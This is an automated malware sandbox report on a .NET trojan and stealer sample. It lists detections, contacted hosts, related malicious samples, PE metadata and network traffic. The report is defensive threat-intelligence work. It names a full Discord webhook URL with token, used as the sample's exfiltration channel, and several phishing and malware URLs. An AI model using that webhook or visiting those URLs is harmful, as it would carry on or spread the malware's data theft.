T_240369_S#U0130PAR#U0130S.exe	47%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
T_240369_S#U0130PAR#U0130S.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
discord.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://discord.com	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd	0%	Avira URL Cloud	safe
http://discord.com	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWub	0%	Avira URL Cloud	safe
https://discord.com	1%	Virustotal		Browse
http://discord.com	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
discord.com	162.159.137.232	true	true	1%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://discord.com	T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://media.discordapp.net/attachments/1220534378975854717/1222892686101708902/user-528110_2024-0	T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWub	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://ip-api.com	T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/1220534378975854717/1222892686101708902/user-528110_2024-03-	T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://discord.com	T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.137.232	discord.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417014
Start date and time:	2024-03-28 13:58:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	T_240369_S#U0130PAR#U0130S.exe renamed because original name is a hash value
Original Sample Name:	T_240369_SPARS.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 377 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:58:55	API Interceptor	10803877x Sleep call for process: T_240369_S#U0130PAR#U0130S.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	ip-api.com/json/?fields=11827
	x.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	salaryinfo24.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	Wage_Plan_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	DHL AWB_5934_5682.pdf.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Yeni sipari#U015f.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Payment Slip (SWIFT)#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	ESTADO DE CUENTA DHL -46474637.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
162.159.137.232	biden.ps1	Get hash	malicious	Unknown	Browse
	stub_builder.exe	Get hash	malicious	Blank Grabber	Browse
	STRIKER.exe	Get hash	malicious	Unknown	Browse
	e.exe	Get hash	malicious	Unknown	Browse
	MNPOk988.exe	Get hash	malicious	AgentTesla, Discord Token Stealer	Browse
	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	paymen_Copy2024tslip.exe	Get hash	malicious	Vector Stealer	Browse
	Built.exe	Get hash	malicious	Blank Grabber	Browse
	http://marketing-volt.at.ply.gg	Get hash	malicious	Unknown	Browse
	17087985678d37d3b9753a4ad20a0f21a298f76cc8f2443c078d96cd6b41214604c859966f722.dat-decoded.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	biden.ps1	Get hash	malicious	Unknown	Browse	162.159.137.232
	z40Lsbgddffz3E3gUR.exe	Get hash	malicious	AgentTesla	Browse	162.159.138.232
	yM1WTtfwI3.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	162.159.135.232
	h08xdwuTfW.elf	Get hash	malicious	Unknown	Browse	162.159.128.233
	stub_builder.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	STRIKER.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	STRIKER.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	SecuriteInfo.com.MacOS.ReverseShell-C.28203.22681.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	162.159.128.233
	e.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	e.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
ip-api.com	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	208.95.112.1
	x.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	salaryinfo24.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Wage_Plan_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	DHL AWB_5934_5682.pdf.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Yeni sipari#U015f.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Payment Slip (SWIFT)#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	ESTADO DE CUENTA DHL -46474637.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	proforma invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://adobeacrobatreviewandsigndocumet.se-sto-1.linodeobjects.com/outlook-office-com-automailerbj-7634-3434-234-2324-azure4324-office3653-7644-4443-434.html	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://colourlyrics.com/fe/KtHc5ruvtRkZFoArrtthaJsvCmg3Rb7X4JToP666Ry87hz3e3rFuRJGAPKBcoBZjAZJZK4pouqXoieozb8x97ijrpxmdxNfsxaBCR2nGFdZnrhtCVLagarbeJ5bjm2rcgeCmZPnkCo2NqoSFB3o6MQ	Get hash	malicious	Unknown	Browse	104.16.122.175
	biden.ps1	Get hash	malicious	Unknown	Browse	172.67.186.190
	QJwM0vJ5mk.exe	Get hash	malicious	LummaC	Browse	172.67.74.152
	mUY60MPRcJ.exe	Get hash	malicious	LummaC	Browse	172.67.187.135
	SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.156.246
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.16964.6395.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	http://avsvmcloud.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://topteamoscarlubricants.online/nba#ZGluYUBqdmRtLmNvLnph	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
TUT-ASUS	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	208.95.112.1
	x.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	salaryinfo24.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Wage_Plan_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	DHL AWB_5934_5682.pdf.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Yeni sipari#U015f.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Payment Slip (SWIFT)#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	ESTADO DE CUENTA DHL -46474637.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	proforma invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.159.137.232
	biden.ps1	Get hash	malicious	Unknown	Browse	162.159.137.232
	QJwM0vJ5mk.exe	Get hash	malicious	LummaC	Browse	162.159.137.232
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.16964.6395.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.159.137.232
	SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe	Get hash	malicious	Clipboard Hijacker, XWorm, Xmrig	Browse	162.159.137.232
	11111.lnk	Get hash	malicious	Unknown	Browse	162.159.137.232
	SecuriteInfo.com.Win64.CrypterX-gen.24907.17990.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	162.159.137.232
	f699.js	Get hash	malicious	Unknown	Browse	162.159.137.232
	x.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	162.159.137.232
	Move Mouse.exe	Get hash	malicious	Unknown	Browse	162.159.137.232

Process:	C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	716
Entropy (8bit):	5.350074230533824
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAyoDLI4MWuPrePEniOKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:ML9E4KXAE4KzecKDE4KhKiKhIE4Ks
MD5:	7D0A4E7B65EB8F1F991914349DFC3F38
SHA1:	ADDE7BF0347ACABF117A836B31C455673592DB68
SHA-256:	D82B9DB5A8FDE89D96A2D30A8480D84F028C959A47C1D954CE22A7CE983E9CA6
SHA-512:	EBB65BF1F610E386F04BCE56BA968B8D63596856B2352F0EC948892ECD1B00CAC34FC4AAD2DC82E4653F7A8B13E2321C721D4A95019B98B1D8608CF802A172F7
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.2862849715382
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	T_240369_S#U0130PAR#U0130S.exe
File size:	2'987'520 bytes
MD5:	73f2aa0989d9fcb98763fbb461422f9f
SHA1:	27b4d0302c43e95c19942eea9dea94d673e18578
SHA256:	843fa4dd9e5d81d150e4d6cd251dc26dafc7409bb4516abebce70114c62548c6
SHA512:	040c671c5f1bf2eecc391680ce18f728d4c818b170d9e240541f2cfc8fa1f160c6f3feeacec78ccbfcd0010694c9a17acf926e0c0a9b8a7145bc199970dd7abd
SSDEEP:	49152:A7XLm8xI2nCY8EoVZT6JGsBp0PWInu9vxnBoqdWGJa/3HWPWar:mbmJYpoVwlpuWX9l3a/3HMWa
TLSH:	5DD59E62668E45FCCE4A6B3AC29F66012BFDD1C10773C75F2D1A362B388335BD90549A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.f..................-.........~.-.. ....-...@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x6dab7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66052811 [Thu Mar 28 08:19:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2dab30	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2dc000	0x528	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2de000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2d8b84	0x2d8c00	cf14c388eb314d7f40f7f1253599315d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2dc000	0x528	0x600	5a53f8df5c3fdb6d0bdac0e1b5375ab7	False	0.390625	data	3.760679040227803	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2de000	0xc	0x200	990762cb0a8837f485aa32f3d7b85be7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2dc0a0	0x2d4	data			0.43370165745856354
RT_MANIFEST	0x2dc374	0x1b4	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators			0.5642201834862385

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/28/24-13:58:56.493013	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49730	443	192.168.2.4	162.159.137.232

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 28, 2024 13:58:55.081116915 CET	49729	80	192.168.2.4	208.95.112.1
Mar 28, 2024 13:58:55.206790924 CET	80	49729	208.95.112.1	192.168.2.4
Mar 28, 2024 13:58:55.206891060 CET	49729	80	192.168.2.4	208.95.112.1
Mar 28, 2024 13:58:55.207818985 CET	49729	80	192.168.2.4	208.95.112.1
Mar 28, 2024 13:58:55.333668947 CET	80	49729	208.95.112.1	192.168.2.4
Mar 28, 2024 13:58:55.389553070 CET	49729	80	192.168.2.4	208.95.112.1
Mar 28, 2024 13:58:56.049932003 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.049969912 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.050059080 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.058064938 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.058074951 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.274391890 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.274468899 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.277549028 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.277556896 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.278059006 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.327042103 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.333962917 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.376246929 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.492614031 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.492957115 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.492969036 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.785614014 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.785732031 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.785785913 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.785795927 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.785847902 CET	443	49730	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.785933971 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.789705992 CET	49730	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.808509111 CET	49729	80	192.168.2.4	208.95.112.1
Mar 28, 2024 13:58:56.809144020 CET	49731	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.809174061 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.809346914 CET	49731	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.809550047 CET	49731	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:56.809561014 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:56.933857918 CET	80	49729	208.95.112.1	192.168.2.4
Mar 28, 2024 13:58:56.933975935 CET	49729	80	192.168.2.4	208.95.112.1
Mar 28, 2024 13:58:57.004930973 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:57.006681919 CET	49731	443	192.168.2.4	162.159.137.232
Mar 28, 2024 13:58:57.006717920 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:57.235474110 CET	443	49731	162.159.137.232	192.168.2.4
Mar 28, 2024 13:58:57.235748053 CET	49731	443	192.168.2.4	162.159.137.232
